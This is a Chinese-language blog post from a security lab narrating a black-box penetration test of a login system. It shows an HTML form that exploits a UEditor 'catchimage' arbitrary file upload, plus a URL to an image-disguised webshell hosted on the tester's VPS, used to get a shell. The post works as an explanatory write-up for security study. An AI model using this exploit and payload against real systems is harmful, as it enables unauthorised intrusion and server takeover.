点击蓝字 关注我们
日期:2023-05-26 作者:goout 介绍:分享一次幸运的渗透测试~
0x00 前言
故事就从[故事的开始]开始~
分享一次半真半假的渗透测试~
0x01 故事的开始
1.1 主角介绍
此次目标是一个登录窗口,无账号进行黑盒测试,测试范围为该业务系统:
1.2 新手村的攻击
(1)目录扫描
(2)登录爆破
(3)尝试注册
(4)信息收集
github
、零零信安等多个平台收集该目标泄露信息无果。
(5)其他尝试
到此处,能用的方式基本都用完了,后面就是反反复复地查看系统的所有信息,重复抓包尝试绕过登录,绕过注册。
0x02 故事的发展
2.1 峰回路转
多次的过滤信息,发现数据包的 Cookie
中有自己忽略掉的信息,Cookie
中一个参数名字可能为某一个框架的名字:
github
搜索一下,看了几套源码,直到看到 Application.Web
这一套,感觉应该就是这个了:
发现系统使用 UEditor
编辑器,查看 UEditor
的版本:
拼接下路径,验证系统确实使用该套源码:
2.2 云开月明
查看 UEditor
的配置文件,根据网上公开的 UEditor
任意文件上传漏洞,找到文件上传接口:
新建html
:
<form action="http://xxxxxxxxxx/Utility/UEditor/net?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
vps
放置图片马:
访问 html
,输入远程的图片马进行上传:
http://xx.xx.xx.xx:8088/a.png?.aspx
上传成功:
拼接路径,getshell
:
0x03 故事的结尾
这次测试确实幸运,能在较短时间内找到源码,权当趣事分享一下~
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
原文始发于微信公众号(宸极实验室):『渗透测试』无巧不成书
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论